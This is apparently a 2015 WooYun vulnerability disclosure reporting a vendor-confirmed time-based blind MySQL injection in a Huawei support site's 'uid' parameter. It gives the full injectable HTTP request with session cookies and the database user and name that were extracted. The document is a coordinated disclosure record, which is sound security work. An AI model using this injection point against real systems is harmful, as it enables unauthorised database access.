华为某站点MySQL盲注

编号119369
Urlhttp://www.wooyun.org/bug.php?action=view&id=119369
漏洞状态厂商已经确认
漏洞标题华为某站点MySQL盲注
漏洞类型SQL注射漏洞
厂商华为技术有限公司
白帽子lijiejie
提交日期2015-06-09 21:21:00
公开日期2015-07-24 23:40:00
修复时间(not set)
确认时间2015-06-09 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank15
漏洞简介
华为某站点MySQL盲注
漏洞细节

注入点:

GET /ecommunity/?act=myAsk&app=space&mod=ask&mod=Ask&status=continue&uid=* HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://support-hk.huawei.com
Cookie: PHPSESSID=1bhehv3tqmjt30j6kdb5k9q7j0; hwsso_uniportal=""; hwsso_login=""; supporteSID=0000qKYnT5iShEs-X9DFmSxPE_7:190618r6n; supportelang=zh; lang=zh; SPE_q_category=czoxNDM6Ilt7ImFza0lkIjoiMTAwMDEyODMiLCJjbGFzc2lmeUlkIjoiMTA2OSIsInRpdGxlIjoiSVQiLCJsZXZlbCI6IjEifSx7ImFza0lkIjoiMTAwMDEyODMiLCJjbGFzc2lmeUlkIjoiMTA3NSIsInRpdGxlIjoiXHU1YjU4XHU1MGE4IiwibGV2ZWwiOiIyIn1dIjs%3D; .ASPXAUTH=1611E611DD1C9A8978C2074A27AAB3EF88C588019E30824D3ED7B28421BBA82BF01202A361F19C335D196A8276141E012A62511052C27819040DD1F8E5DC6A514985C52E5961D7997FB76986CCA17169E5AA82338188A2570547486BACFEB6AB3112D6559AAB8E34D0599C2E0530E1567F40161DAE1D47E45C1ECBB23BA088EA7281307C6886A12D6DADFE85D8EBF91E7C5CE883; USERID=""; trainingSID=0000IPW1YhTqGwe71X-L_iT0ewd:19061h66u; downloadeSID=00005ZshPKvqKv3xvzufqF634ej:1906138e6
Host: support-hk.huawei.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*


uid可注入,MySQL time blind.

POC

current user:    '[email protected]%'
current database: 'supporte'


站点猜解比较慢,未继续猜解表格和数据。

修复方案

参数过滤

状态信息 2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开
厂商回复感谢提醒。我们将通知业务整改。
回应信息危害等级:高漏洞Rank:15 确认时间:2015-06-09 23:39